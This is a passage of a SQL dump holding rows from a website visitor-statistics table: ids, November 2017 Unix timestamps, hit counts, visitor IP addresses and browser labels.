255.65.58','other'),(180891,1511499053,2,2,0,0,'216.244.66.237','other'),(180892,1511499572,1,1,0,0,'51.255.71.121','other'),(180893,1511499817,1,1,0,0,'217.182.132.173','other'),(180894,1511499866,1,1,0,0,'141.8.142.74','other'),(180895,1511499915,1,1,0,0,'51.255.65.53','other'),(180896,1511500459,1,1,0,0,'51.255.71.114','other'),(180897,1511500772,5,5,0,0,'46.229.168.74','other'),(180898,1511500786,4,4,0,0,'46.229.168.67','other'),(180899,1511500809,5,5,0,0,'46.229.168.71','other'),(180900,1511500822,5,5,0,0,'46.229.168.80','other'),(180901,1511500842,4,4,0,0,'46.229.168.69','other'),(180902,1511500894,3,3,0,0,'46.229.168.79','other'),(180903,1511500933,4,4,0,0,'46.229.168.68','other'),(180904,1511500979,10,10,0,0,'46.229.168.70','other'),(180905,1511500983,5,5,0,0,'46.229.168.65','other'),(180906,1511501001,5,5,0,0,'46.229.168.78','other'),(180907,1511501030,1,1,0,0,'51.255.65.4','other'),(180908,1511501072,4,4,0,0,'46.229.168.72','other'),(180909,1511501147,4,4,0,0,'46.229.168.73','other'),(180910,1511501169,1,1,0,0,'217.182.132.155','other'),(180911,1511501199,6,6,0,0,'46.229.168.66','other'),(180912,1511501372,1,1,0,0,'207.46.13.178','other'),(180913,1511501694,4,4,0,0,'46.229.168.67','other'),(180914,1511501743,3,3,0,0,'46.229.168.74','other'),(180915,1511501816,5,5,0,0,'46.229.168.79','other'),(180916,1511501890,8,8,0,0,'46.229.168.71','other'),(180917,1511501919,1,1,0,0,'217.182.132.149','other'),(180918,1511501958,3,3,0,0,'46.229.168.78','other'),(180919,1511501979,7,7,0,0,'46.229.168.65','other'),(180920,1511502034,1,1,0,0,'216.244.66.237','other'),(180921,1511502035,9,9,0,0,'46.229.168.70','other'),(180922,1511502050,3,3,0,0,'46.229.168.68','other'),(180923,1511502107,1,1,0,0,'46.229.168.73','other'),(180924,1511502166,6,6,0,0,'46.229.168.69','other'),(180925,1511502180,6,6,0,0,'46.229.168.66','other'),(180926,1511502523,6,6,0,0,'46.229.168.80','other'),(180927,1511502539,7,7,0,0,'46.229.168.75','other'),(180928,1511502595,1,1,0,0,'91.196.177.46','firefox'),(180929,1511502630,4,4,0,0,'46.229.168.72','other'),(180930,1511502757,5,5,0,0,'46.229.168.67','other'),(180931,1511502888,6,6,0,0,'46.229.168.79','other'),(180932,1511502923,7,7,0,0,'46.229.168.65','other'),(180933,1511503028,4,4,0,0,'46.229.168.70','other'),(180934,1511503070,4,4,0,0,'46.229.168.78','other'),(180935,1511503077,6,6,0,0,'46.229.168.69','other'),(180936,1511503141,2,2,0,0,'46.229.168.66','other'),(180937,1511503295,7,7,0,0,'46.229.168.73','other'),(180938,1511503338,1,1,0,0,'8.29.198.25','other'),(180939,1511503531,9,9,0,0,'46.229.168.68','other'),(180940,1511503541,1,1,0,0,'141.8.142.74','other'),(180941,1511503564,5,5,0,0,'46.229.168.74','other'),(180942,1511503633,1,1,0,0,'40.77.167.88','other'),(180943,1511503660,6,6,0,0,'46.229.168.67','other'),(180944,1511503676,2,2,0,0,'46.229.168.72','other'),(180945,1511503714,2,2,0,0,'46.229.168.75','other'),(180946,1511503800,6,6,0,0,'46.229.168.80','other'),(180947,1511503811,1,1,0,0,'212.111.198.100','chrome'),(180948,1511503962,1,1,0,0,'51.255.65.32','other'),(180949,1511503992,7,7,0,0,'46.229.168.78','other'),(180950,1511503999,8,8,0,0,'46.229.168.69','other'),(180951,1511504036,4,4,0,0,'46.229.168.65','other'),(180952,1511504093,6,6,0,0,'46.229.168.71','other'),(180953,1511504107,10,10,0,0,'46.229.168.66','other'),(180954,1511504220,4,4,0,0,'46.229.168.70','other'),(180955,1511504438,1,1,0,0,'217.182.132.34','other'),(180956,1511504480,9,9,0,0,'46.229.168.68','other'),(180957,1511504493,10,10,0,0,'46.229.168.74','other'),(180958,1511504581,2,2,0,0,'46.229.168.73','other'),(180959,1511504617,5,5,0,0,'46.229.168.67','other'),(180960,1511504699,7,7,0,0,'46.229.168.79','other'),(180961,1511504707,1,1,0,0,'40.77.167.88','other'),(180962,1511504923,5,5,0,0,'46.229.168.69','other'),(180963,1511505012,2,2,0,0,'46.229.168.80','other'),(180964,1511505076,7,7,0,0,'46.229.168.72','other'),(180965,1511505098,1,1,0,0,'207.46.13.178','other'),(180966,1511505142,2,2,0,0,'46.229.168.66','other'),(180967,1511505148,1,1,0,0,'51.255.71.132','other'),(180968,1511505214,2,2,0,0,'46.229.168.70','other'),(180969,1511505226,2,2,0,0,'141.8.142.74','other'),(180970,1511505250,3,3,0,0,'46.229.168.65','other'),(180971,1511505415,1,1,0,0,'217.182.132.241','other'),(180972,1511505432,1,1,0,0,'91.196.178.65','chrome'),(180973,1511505440,1,1,0,0,'164.132.162.157','other'),(180975,1511505465,3,3,0,0,'46.229.168.78','other'),(180976,1511505488,1,1,0,0,'46.229.168.71','other'),(180977,1511505534,1,1,0,0,'46.229.168.67','other'),(180978,1511505553,1,1,0,0,'46.229.168.73','other'),(180979,1511505638,1,1,0,0,'217.182.132.16','other'),(180980,1511506675,1,1,0,0,'51.255.65.38','other'),(180981,1511506868,1,1,0,0,'217.182.132.69','other'),(180982,1511508226,1,1,0,0,'217.182.132.84','other'),(180983,1511508591,2,2,0,0,'91.196.178.68','chrome'),(180984,1511508855,1,1,0,0,'92.112.225.106','chrome'),(180985,1511508900,1,1,0,0,'216.244.66.237','other'),(180986,1511509256,1,1,0,0,'51.255.65.82','other'),(180987,1511509603,1,1,0,0,'217.182.132.70','other'),(180988,1511509996,1,1,0,0,'92.112.225.106','chrome'),(180989,1511510219,1,1,0,0,'71.172.20.3','chrome'),(180990,1511510273,1,1,0,0,'216.244.66.237','other'),(180991,1511510316,1,1,0,0,'217.182.132.17','other'),(180992,1511510378,1,1,0,0,'92.113.94.129','firefox'),(180993,1511510418,1,1,0,0,'157.55.39.5','other'),(180994,1511510490,1,1,0,0,'217.182.132.23','other'),(180995,1511510744,1,1,0,0,'217.182.132.179','other'),(180996,1511511650,1,1,0,0,'217.182.132.36','other'),(180997,1511511950,1,1,0,0,'89.21.75.233','firefox'),(180998,1511512805,1,1,0,0,'51.255.65.25','other'),(180999,1511512994,1,1,0,0,'51.255.65.20','other'),(181000,1511513139,1,1,0,0,'217.182.132.90','other'),(181001,1511513481,1,1,0,0,'217.182.132.95','other'),(181002,1511513808,20,20,0,0,'62.210.157.95','other'),(181003,1511513996,1,1,0,0,'188.166.71.91','chrome'),(181004,1511514073,2,2,0,0,'141.8.142.74','other'),(181005,1511514082,1,1,0,0,'40.77.167.88','other'),(181006,1511514160,1,1,0,0,'8.29.198.27','other'),(181007,1511514295,1,1,0,0,'91.196.178.65','firefox'),(181008,1511514692,1,1,0,0,'51.255.65.97','other'),(181009,1511514695,1,1,0,0,'37.55.227.92','chrome'),(181010,1511514754,1,0,1,0,'66.249.70.27',''),(181011,1511514871,1,1,0,0,'82.146.57.46','firefox'),(181012,1511515028,5,5,0,0,'188.32.129.128','msie'),(181013,1511515224,1,1,0,0,'217.182.132.193','other'),(181014,1511515322,3,3,0,0,'95.10.29.116','other'),(181015,1511515378,1,1,0,0,'178.95.195.7','chrome'),(181016,1511515858,1,1,0,0,'91.196.178.65','chrome'),(181017,1511515939,1,0,1,0,'66.249.64.28',''),(181018,1511515998,1,1,0,0,'188.32.129.128','msie'),(181019,1511516035,1,1,0,0,'51.255.65.23','other'),(181020,1511516108,1,1,0,0,'91.209.11.236','other'),(181021,1511516118,1,1,0,0,'164.132.162.188','other'),(181022,1511516611,1,1,0,0,'51.255.65.15','other'),(181023,1511516644,1,1,0,0,'141.8.142.74','other'),(181024,1511517190,1,1,0,0,'51.255.71.130','other'),(181025,1511517817,1,1,0,0,'91.196.178.65','chrome'),(181026,1511518231,1,1,0,0,'51.255.65.31','other'),(181027,1511518313,1,1,0,0,'217.182.132.35','other'),(181028,1511518935,1,1,0,0,'51.255.65.48','other'),(181029,1511518966,1,1,0,0,'164.132.162.155','other'),(181030,1511519317,1,1,0,0,'51.255.65.39','other'),(181031,1511519407,1,1,0,0,'51.255.65.32','other'),(181032,1511519709,1,1,0,0,'217.182.132.70','other'),(181033,1511520019,1,1,0,0,'91.196.178.70','chrome'),(181034,1511520393,1,1,0,0,'66.249.70.29','chrome'),(181035,1511520547,1,1,0,0,'66.249.64.30','chrome'),(181036,1511520667,1,1,0,0,'141.8.142.74','other'),(181037,1511520727,1,1,0,0,'137.74.201.100','other'),(181038,1511520956,1,1,0,0,'51.255.65.83','other'),(181039,1511521001,1,1,0,0,'51.255.65.47','other'),(181040,1511521120,1,1,0,0,'91.196.178.66','firefox'),(181041,1511521691,1,1,0,0,'217.182.132.183','other'),(181042,1511521853,1,0,1,0,'68.180.229.52',''),(181043,1511521932,1,1,0,0,'91.196.178.70','chrome'),(181044,1511521973,1,1,0,0,'217.182.132.27','other'),(181045,1511522387,1,1,0,0,'141.8.142.74','other'),(181046,1511522389,1,1,0,0,'91.196.178.135','firefox'),(181047,1511522649,1,1,0,0,'137.74.207.102','other'),(181048,1511523216,1,1,0,0,'217.182.132.78','other'),(181049,1511523291,2,2,0,0,'216.244.66.237','other'),(181050,1511523752,1,1,0,0,'51.255.65.96','other'),(181051,1511524111,1,1,0,0,'51.255.65.81','other'),(181052,1511524150,1,1,0,0,'51.255.65.97','other'),(181053,1511524468,1,1,0,0,'164.132.162.156','other'),(181054,1511524638,2,2,0,0,'216.244.66.237','other'),(181055,1511524713,1,1,0,0,'51.255.65.25','other'),(181056,1511524905,1,1,0,0,'217.182.132.7','other'),(181057,1511525007,1,1,0,0,'8.29.198.25','other'),(181058,1511525325,1,1,0,0,'51.255.65.76','other'),(181059,1511525548,1,1,0,0,'51.255.65.86','other'),(181060,1511525670,1,1,0,0,'157.55.39.5','other'),(181061,1511525883,5,5,0,0,'69.30.198.178','other'),(181062,1511526038,1,1,0,0,'178.154.171.88','other'),(181063,1511526072,1,1,0,0,'216.244.66.237','other'),(181064,1511526277,3,3,0,0,'95.10.29.116','other'),(181065,1511526842,1,1,0,0,'51.255.71.130','other'),(181066,1511527252,1,1,0,0,'176.96.198.174','chrome'),(181067,1511527423,1,1,0,0,'216.244.66.237','other'),(181068,1511527477,1,1,0,0,'217.182.132.192','other'),(181069,1511527480,1,1,0,0,'217.182.132.150','other'),(181070,1511527638,1,1,0,0,'46.63.61.120','firefox'),(181071,1511527843,1,1,0,0,'178.154.200.32','other'),(181072,1511527915,1,1,0,0,'141.8.132.19','other'),(181073,1511528069,1,1,0,0,'51.255.65.54','other'),(181074,1511528428,1,1,0,0,'91.196.178.68','firefox'),(181075,1511528745,1,1,0,0,'91.196.178.70','firefox'),(181076,1511528755,2,2,0,0,'51.255.65.84','other'),(181077,1511528969,1,1,0,0,'178.94.173.156','chrome'),(181078,1511529409,1,1,0,0,'178.154.171.60','other'),(181079,1511529709,1,1,0,0,'176.96.198.174','chrome'),(181080,1511529784,1,1,0,0,'51.255.71.129','other'),(181081,1511529950,1,1,0,0,'180.76.15.147','other'),(181082,1511530185,1,1,0,0,'207.46.13.178','other'),(181083,1511530235,1,1,0,0,'178.154.171.81','other'),(181084,1511530291,1,1,0,0,'217.182.132.70','other'),(181085,1511530293,1,1,0,0,'217.182.132.54','other'),(181086,1511530332,1,1,0,0,'37.9.113.63','other'),(181087,1511530656,1,1,0,0,'91.196.178.164','chrome'),(181088,1511530876,1,1,0,0,'217.182.132.7','other'),(181089,1511531075,1,1,0,0,'217.182.132.179','other'),(181090,1511531298,1,1,0,0,'207.46.13.178','other'),(181091,1511531433,1,1,0,0,'216.244.66.237','other'),(181092,1511531449,1,1,0,0,'217.182.132.173','other'),(181093,1511531640,1,1,0,0,'217.182.132.57','other'),(181094,1511532227,1,1,0,0,'217.182.132.67','other'),(181095,1511532540,1,1,0,0,'51.255.71.111','other'),(181096,1511533198,1,1,0,0,'5.228.2.250','msie'),(181097,1511533199,1,1,0,0,'5.165.179.163','msie'),(181100,1511533200,1,1,0,0,'77.37.169.25','msie'),(181101,1511533361,1,1,0,0,'162.210.196.130','other'),(181102,1511533950,1,1,0,0,'180.76.15.149','other'),(181103,1511534118,1,1,0,0,'51.255.65.77','other'),(181104,1511534171,1,1,0,0,'137.74.207.170','other'),(181105,1511534697,1,1,0,0,'51.255.65.52','other'),(181106,1511534786,1,1,0,0,'37.9.113.56','other'),(181107,1511535127,1,1,0,0,'137.74.207.109','other'),(181108,1511535487,1,1,0,0,'91.209.11.236','other'),(181109,1511535554,1,1,0,0,'91.196.178.167','chrome'),(181110,1511535650,1,1,0,0,'51.255.71.113','other'),(181111,1511535846,1,1,0,0,'8.29.198.26','other'),(181112,1511536377,1,1,0,0,'207.46.13.178','other'),(181113,1511536695,2,2,0,0,'216.244.66.237','other'),(181114,1511536702,1,1,0,0,'207.46.13.206','other'),(181115,1511537263,1,1,0,0,'37.9.113.157','other'),(181116,1511537328,1,1,0,0,'137.74.201.99','other'),(181117,1511537639,1,1,0,0,'51.255.65.92','other'),(181118,1511537660,1,1,0,0,'217.182.132.19','other'),(181119,1511537766,1,1,0,0,'37.9.113.114','other'),(181120,1511537882,1,0,1,0,'68.180.229.52',''),(181121,1511538209,1,1,0,0,'37.9.113.132','other'),(181122,1511538302,1,1,0,0,'178.154.171.10','other'),(181123,1511538306,1,1,0,0,'87.250.224.96','other'),(181124,1511538409,2,2,0,0,'216.244.66.237','other'),(181125,1511538528,1,1,0,0,'217.182.132.52','other'),(181126,1511538853,1,1,0,0,'178.154.171.55','other'),(181127,1511539959,1,1,0,0,'216.244.66.237','other'),(181128,1511540446,1,1,0,0,'37.73.240.192','chrome'),(181129,1511540895,1,1,0,0,'213.180.203.7','other'),(181130,1511541169,1,0,1,0,'66.249.64.30',''),(181131,1511541290,2,2,0,0,'216.244.66.237','other'),(181132,1511541380,1,0,1,0,'66.249.70.27',''),(181133,1511541754,2,2,0,0,'37.9.113.157','other'),(181134,1511541835,1,1,0,0,'213.180.203.7','other'),(181135,1511541966,1,1,0,0,'46.149.80.30','chrome'),(181136,1511542053,1,1,0,0,'216.145.17.190','firefox'),(181137,1511542175,1,1,0,0,'178.154.171.81','other'),(181138,1511542618,1,1,0,0,'37.9.113.74','other'),(181139,1511542742,1,1,0,0,'216.244.66.237','other'),(181140,1511542886,1,1,0,0,'207.46.13.178','other'),(181141,1511543454,1,1,0,0,'207.46.13.206','other'),(181142,1511543780,3,0,3,0,'68.180.229.52',''),(181143,1511543873,2,2,0,0,'87.250.224.77','other'),(181144,1511544221,2,2,0,0,'216.244.66.237','other'),(181145,1511544324,1,1,0,0,'128.69.211.127','firefox'),(181146,1511544399,1,1,0,0,'87.250.224.46','other'),(181147,1511544403,1,1,0,0,'37.9.113.182','other'),(181148,1511545309,1,0,1,0,'68.180.229.52',''),(181149,1511545716,2,2,0,0,'216.244.66.237','other'),(181150,1511546359,6,6,0,0,'173.212.195.163','other'),(181151,1511546551,1,1,0,0,'178.154.171.88','other'),(181152,1511546677,1,1,0,0,'8.29.198.25','other'),(181153,1511547109,1,1,0,0,'37.9.113.138','other'),(181154,1511547426,3,3,0,0,'216.244.66.237','other'),(181155,1511547893,1,1,0,0,'91.209.11.236','other'),(181156,1511548266,2,2,0,0,'141.8.142.74','other'),(181157,1511548292,1,0,1,0,'68.180.229.52',''),(181158,1511548822,1,1,0,0,'178.154.171.88','other'),(181159,1511548881,2,2,0,0,'216.244.66.237','other'),(181160,1511549318,1,1,0,0,'37.9.113.115','other'),(181161,1511550370,1,0,1,0,'66.249.70.27',''),(181162,1511551198,1,1,0,0,'141.8.142.74','other'),(181163,1511551202,1,1,0,0,'87.250.224.46','other'),(181164,1511551799,1,1,0,0,'178.154.171.55','other'),(181165,1511551991,1,0,1,0,'66.249.64.29',''),(181166,1511552164,1,0,1,0,'66.249.70.29',''),(181167,1511553088,1,1,0,0,'141.8.142.74','other'),(181168,1511553296,1,1,0,0,'216.244.66.237','other'),(181169,1511553532,1,1,0,0,'40.77.167.81','other'),(181170,1511553980,1,0,1,0,'66.249.64.30',''),(181171,1511554612,1,1,0,0,'66.249.64.30','chrome'),(181172,1511554723,1,1,0,0,'66.249.70.25','chrome'),(181173,1511554725,1,1,0,0,'178.154.171.88','other'),(181174,1511554846,1,1,0,0,'141.8.142.74','other'),(181175,1511556246,2,2,0,0,'216.244.66.237','other'),(181176,1511557512,1,1,0,0,'8.29.198.25','other'),(181177,1511557598,1,1,0,0,'216.244.66.237','other'),(181178,1511559204,1,1,0,0,'216.244.66.237','other'),(181179,1511560566,4,4,0,0,'216.244.66.237','other'),(181180,1511560780,1,1,0,0,'178.154.171.88','other'),(181181,1511561339,1,1,0,0,'46.42.175.251','chrome'),(181182,1511562514,1,1,0,0,'216.244.66.237','other'),(181183,1511563351,1,1,0,0,'207.46.13.206','other'),(181184,1511564149,2,2,0,0,'216.244.66.237','other'),(181185,1511564827,1,0,1,0,'66.249.64.29',''),(181186,1511565413,1,1,0,0,'176.102.54.215','firefox'),(181187,1511565481,1,1,0,0,'216.244.66.237','other'),(181188,1511567062,1,1,0,0,'91.196.178.168','chrome'),(181189,1511567083,1,0,1,0,'66.249.64.28',''),(181190,1511567652,1,1,0,0,'180.76.15.140','other'),(181191,1511568348,1,1,0,0,'8.29.198.25','other'),(181192,1511568782,1,0,1,0,'66.249.64.28',''),(181193,1511569511,2,2,0,0,'216.244.66.237','other'),(181194,1511572585,1,1,0,0,'51.255.71.120','other'),(181195,1511572843,1,1,0,0,'51.255.65.57','other'),(181196,1511574232,2,0,2,0,'66.249.70.25',''),(181197,1511574687,1,0,1,0,'66.249.64.30',''),(181198,1511574948,1,1,0,0,'217.182.132.59','other'),(181199,1511575116,1,1,0,0,'137.74.207.159','other'),(181200,1511575274,1,1,0,0,'217.182.132.97','other'),(181201,1511575327,1,1,0,0,'51.255.65.4','other'),(181202,1511575355,1,1,0,0,'51.255.65.30','other'),(181203,1511575666,1,1,0,0,'51.255.65.31','other'),(181204,1511575698,1,1,0,0,'217.182.132.15','other'),(181205,1511575810,1,1,0,0,'51.255.65.73','other'),(181206,1511576082,1,1,0,0,'217.182.132.147','other'),(181207,1511576104,1,1,0,0,'217.182.132.184','other'),(181208,1511576354,1,1,0,0,'217.182.132.60','other'),(181209,1511576470,1,1,0,0,'51.255.65.13','other'),(181210,1511577050,1,1,0,0,'51.255.71.113','other'),(181211,1511577463,1,1,0,0,'51.255.65.69','other'),(181212,1511577585,3,3,0,0,'216.244.66.237','other'),(181213,1511577633,1,1,0,0,'217.182.132.76','other'),(181214,1511577690,1,0,1,0,'66.249.64.28',''),(181215,1511578480,1,1,0,0,'51.255.65.96','other'),(181216,1511578839,1,1,0,0,'216.244.66.237','other'),(181217,1511579186,1,1,0,0,'8.29.198.25','other'),(181218,1511580101,1,1,0,0,'216.244.66.237','other'),(181219,1511580386,1,1,0,0,'40.77.167.81','other'),(181220,1511581018,1,1,0,0,'217.182.132.175','other'),(181221,1511581162,1,1,0,0,'66.249.64.30','chrome'),(181222,1511581526,1,1,0,0,'176.31.231.10','other'),(181223,1511581918,1,1,0,0,'51.255.65.67','other'),(181224,1511582637,1,1,0,0,'180.76.15.150','other'),(181225,1511582716,1,1,0,0,'51.255.65.72','other'),(181226,1511582834,1,1,0,0,'216.244.66.237','other'),(181227,1511583247,1,1,0,0,'51.255.65.74','other'),(181228,1511583296,1,1,0,0,'51.255.65.37','other'),(181229,1511583326,1,1,0,0,'51.255.71.115','other'),(181230,1511583498,1,1,0,0,'217.182.132.61','other'),(181231,1511583608,1,1,0,0,'51.255.65.40','other'),(181232,1511583931,1,1,0,0,'51.255.65.46','other'),(181233,1511584016,1,1,0,0,'51.255.71.119','other'),(181234,1511584222,1,1,0,0,'51.255.65.31','other'),(181235,1511584230,1,1,0,0,'217.182.132.182','other'),(181236,1511584349,1,1,0,0,'217.182.132.66','other'),(181237,1511584351,1,1,0,0,'51.255.65.27','other'),(181238,1511584781,1,0,1,0,'66.249.70.29',''),(181239,1511585057,1,0,1,0,'66.249.64.28',''),(181240,1511585148,1,1,0,0,'51.255.71.122','other'),(181241,1511585326,1,1,0,0,'51.255.65.63','other'),(181242,1511586669,1,1,0,0,'216.244.66.237','other'),(181243,1511586916,1,1,0,0,'51.255.65.44','other'),(181244,1511587442,1,0,1,0,'66.249.70.29',''),(181245,1511587758,1,1,0,0,'217.182.132.56','other'),(181246,1511588028,1,1,0,0,'216.244.66.237','other'),(181247,1511588100,1,1,0,0,'217.182.132.95','other'),(181248,1511588289,1,1,0,0,'107.167.105.74','other'),(181249,1511588708,1,0,1,0,'66.249.70.27',''),(181250,1511588985,1,1,0,0,'51.255.65.70','other'),(181251,1511589006,1,1,0,0,'91.200.12.196','chrome'),(181252,1511589007,1,1,0,0,'137.74.207.101','other'),(181253,1511589310,1,1,0,0,'216.244.66.237','other'),(181254,1511590017,1,1,0,0,'8.29.198.27','other'),(181255,1511590045,1,1,0,0,'51.255.65.31','other'),(181256,1511590590,1,1,0,0,'137.74.207.110','other'),(181257,1511590818,1,1,0,0,'217.182.132.57','other'),(181258,1511590998,1,1,0,0,'217.182.132.78','other'),(181259,1511591081,1,1,0,0,'217.182.132.181','other'),(181260,1511591730,1,1,0,0,'51.255.65.9','other'),(181261,1511591891,1,1,0,0,'217.182.132.190','other'),(181262,1511592008,1,1,0,0,'217.182.132.79','other'),(181263,1511592116,1,0,1,0,'66.249.64.30',''),(181264,1511592351,1,1,0,0,'51.255.65.224','other'),(181265,1511593466,1,1,0,0,'188.32.240.162','msie'),(181266,1511593776,1,1,0,0,'217.182.132.18','other'),(181267,1511593815,1,1,0,0,'51.255.65.91','other'),(181268,1511594122,1,1,0,0,'217.182.132.157','other'),(181269,1511594164,1,1,0,0,'51.255.65.2','other'),(181270,1511594679,1,1,0,0,'51.255.71.100','other'),(181271,1511594685,1,1,0,0,'50.3.71.166','chrome'),(181272,1511595344,1,1,0,0,'141.8.142.74','other'),(181273,1511596366,1,1,0,0,'51.255.65.77','other'),(181274,1511596400,1,1,0,0,'51.255.71.133','other'),(181275,1511596836,1,1,0,0,'37.55.57.49','firefox'),(181276,1511596994,1,1,0,0,'217.182.132.78','other'),(181277,1511597361,1,1,0,0,'217.182.132.35','other'),(181278,1511597647,1,1,0,0,'51.255.65.41','other'),(181279,1511598411,1,1,0,0,'40.77.167.86','other'),(181280,1511598736,1,1,0,0,'216.244.66.237','other'),(181281,1511599193,1,1,0,0,'51.255.65.38','other'),(181282,1511599417,25,25,0,0,'51.255.173.45','other'),(181283,1511599453,1,1,0,0,'37.55.57.49','firefox'),(181284,1511599896,1,1,0,0,'51.255.65.74','other'),(181285,1511600054,2,2,0,0,'207.46.13.178','other'),(181286,1511600526,1,1,0,0,'46.48.13.161','chrome'),(181287,1511600800,1,1,0,0,'37.73.234.185','chrome'),(181288,1511600850,1,1,0,0,'8.29.198.25','other'),(181289,1511600878,1,1,0,0,'51.255.65.21','other'),(181290,1511601244,1,1,0,0,'51.255.65.45','other'),(181291,1511601343,1,1,0,0,'51.255.65.64','other'),(181292,1511601631,1,1,0,0,'51.255.65.53','other'),(181293,1511601710,1,1,0,0,'207.46.13.178','other'),(181294,1511601781,1,1,0,0,'51.255.65.95','other'),(181295,1511602119,1,1,0,0,'51.255.65.32','other'),(181296,1511602236,1,1,0,0,'217.182.132.190','other'),(181297,1511602297,2,2,0,0,'217.182.132.7','other'),(181298,1511603692,1,1,0,0,'217.182.132.188','other'),(181299,1511603807,1,1,0,0,'217.182.132.6','other'),(181300,1511604513,1,1,0,0,'217.182.132.178','other'),(181301,1511605271,1,1,0,0,'164.132.162.159','other'),(181302,1511605299,1,1,0,0,'51.255.65.64','other'),(181303,1511605695,1,1,0,0,'40.77.167.86','other'),(181304,1511606312,1,0,1,0,'68.180.229.52',''),(181305,1511606565,1,0,1,0,'66.249.64.29',''),(181306,1511606613,1,1,0,0,'216.244.66.237','other'),(181307,1511606686,1,1,0,0,'51.255.65.4','other'),(181308,1511607582,1,1,0,0,'217.182.132.156','other'),(181309,1511607983,1,1,0,0,'51.255.65.17','other'),(181310,1511608042,1,1,0,0,'137.74.203.194','other'),(181311,1511608061,1,1,0,0,'217.182.132.187','other'),(181312,1511608457,1,1,0,0,'164.132.162.159','other'),(181313,1511608723,1,1,0,0,'51.255.65.71','other'),(181314,1511609793,1,1,0,0,'217.182.132.157','other'),(181315,1511609814,1,1,0,0,'217.182.132.54','other'),(181316,1511609832,1,1,0,0,'94.156.144.191','firefox'),(181317,1511610408,1,1,0,0,'216.244.66.237','other'),(181318,1511611168,1,1,0,0,'51.255.71.131','other'),(181319,1511611694,1,1,0,0,'8.29.198.27','other'),(181320,1511611772,1,1,0,0,'216.244.66.237','other'),(181321,1511612048,1,1,0,0,'217.69.133.9','other'),(181322,1511612067,1,0,1,0,'66.249.64.29',''),(181323,1511612291,1,1,0,0,'91.209.11.236','other'),(181324,1511612361,1,1,0,0,'51.255.65.49','other'),(181325,1511612602,1,1,0,0,'141.8.142.74','other'),(181326,1511613059,2,2,0,0,'216.244.66.237','other'),(181327,1511613064,1,1,0,0,'137.74.207.101','other'),(181328,1511613093,1,1,0,0,'51.255.65.91','other'),(181329,1511613154,1,1,0,0,'217.182.132.16','other'),(181330,1511613284,1,1,0,0,'217.182.132.241','other'),(181331,1511613458,1,1,0,0,'217.182.132.75','other'),(181332,1511614043,1,1,0,0,'217.182.132.37','other'),(181333,1511614403,1,1,0,0,'218.30.103.142','other'),(181334,1511614594,1,1,0,0,'51.255.71.119','other'),(181335,1511614926,1,1,0,0,'66.249.70.29','chrome'),(181336,1511615008,1,1,0,0,'217.182.132.186','other'),(181337,1511615056,1,1,0,0,'66.249.64.29','chrome'),(181338,1511615073,1,1,0,0,'207.46.13.178','other'),(181339,1511615088,1,1,0,0,'40.77.167.86','other'),(181340,1511615230,1,1,0,0,'95.135.89.198','chrome'),(181341,1511615336,1,1,0,0,'51.255.65.45','other'),(181342,1511615515,1,1,0,0,'51.255.65.92','other'),(181343,1511615605,1,1,0,0,'176.105.213.115','chrome'),(181344,1511615624,1,1,0,0,'51.255.65.2','other'),(181345,1511615653,1,1,0,0,'217.182.132.5','other'),(181346,1511615678,1,1,0,0,'51.255.65.53','other'),(181347,1511615705,1,1,0,0,'216.244.66.237','other'),(181348,1511615790,1,1,0,0,'164.132.162.188','other'),(181349,1511615825,1,1,0,0,'137.74.207.188','other'),(181350,1511616198,10,10,0,0,'69.30.205.218','other'),(181351,1511616226,1,1,0,0,'51.255.65.70','other'),(181352,1511616345,1,1,0,0,'213.180.203.40','other'),(181353,1511616387,1,1,0,0,'207.46.13.178','other'),(181354,1511616443,1,1,0,0,'217.182.132.22','other'),(181355,1511616498,1,1,0,0,'51.255.65.30','other'),(181356,1511616933,1,1,0,0,'216.244.66.237','other'),(181357,1511617502,1,1,0,0,'217.182.132.180','other'),(181358,1511617952,1,1,0,0,'213.180.203.40','other'),(181359,1511617993,1,1,0,0,'180.76.15.159','other'),(181360,1511618506,1,1,0,0,'51.255.65.9','other'),(181361,1511618688,1,1,0,0,'178.154.171.88','other'),(181362,1511618692,1,1,0,0,'195.238.108.89','chrome'),(181363,1511619358,1,1,0,0,'51.255.65.65','other'),(181364,1511619788,1,1,0,0,'217.182.132.29','other'),(181365,1511619865,1,1,0,0,'217.182.132.151','other'),(181366,1511619993,1,1,0,0,'180.76.15.153','other'),(181367,1511619994,1,1,0,0,'217.182.132.156','other'),(181368,1511620083,1,1,0,0,'217.182.132.82','other'),(181369,1511620320,1,1,0,0,'87.250.224.46','other'),(181370,1511620449,1,1,0,0,'51.255.65.67','other'),(181371,1511620653,1,1,0,0,'216.244.66.237','other'),(181372,1511620870,1,1,0,0,'217.182.132.29','other'),(181373,1511621732,1,1,0,0,'91.209.11.236','other'),(181374,1511621949,1,1,0,0,'216.244.66.237','other'),(181375,1511621957,1,1,0,0,'87.250.224.46','other'),(181376,1511622167,1,1,0,0,'217.182.132.192','other'),(181377,1511622539,1,1,0,0,'8.29.198.26','other'),(181378,1511622772,1,1,0,0,'51.255.71.131','other'),(181379,1511622803,1,1,0,0,'217.182.132.50','other'),(181380,1511622862,1,1,0,0,'217.182.132.182','other'),(181381,1511623060,1,1,0,0,'37.9.113.110','other'),(181382,1511623220,2,2,0,0,'216.244.66.237','other'),(181383,1511623571,1,1,0,0,'51.255.71.127','other'),(181384,1511623739,1,1,0,0,'137.74.207.170','other'),(181385,1511624196,1,1,0,0,'217.182.132.188','other'),(181386,1511624883,1,1,0,0,'51.255.65.67','other'),(181387,1511625080,1,1,0,0,'94.156.144.191','firefox'),(181388,1511625153,1,0,1,0,'66.249.70.29',''),(181389,1511625196,1,1,0,0,'51.255.65.6','other'),(181390,1511625326,1,1,0,0,'51.255.71.120','other'),(181391,1511625568,1,1,0,0,'51.255.65.224','other'),(181392,1511625923,1,1,0,0,'216.244.66.237','other'),(181393,1511626432,1,1,0,0,'141.8.142.96','other'),(181394,1511626542,1,0,1,0,'66.249.70.27',''),(181395,1511626625,1,1,0,0,'5.45.207.82','other'),(181396,1511627204,1,1,0,0,'216.244.66.237','other'),(181397,1511627483,1,1,0,0,'217.182.132.30','other'),(181398,1511627594,1,1,0,0,'91.196.178.67','firefox'),(181399,1511628294,1,1,0,0,'164.132.162.153','other'),(181400,1511628537,3,3,0,0,'216.244.66.237','other'),(181401,1511628774,1,1,0,0,'51.255.65.36','other'),(181402,1511628871,1,1,0,0,'217.182.132.70','other'),(181403,1511629148,1,1,0,0,'137.74.201.108','other'),(181404,1511629161,1,1,0,0,'37.9.113.207','other'),(181405,1511629762,1,1,0,0,'217.182.132.172','other'),(181406,1511629784,1,1,0,0,'51.255.65.28','other'),(181407,1511629817,3,3,0,0,'37.73.213.195','chrom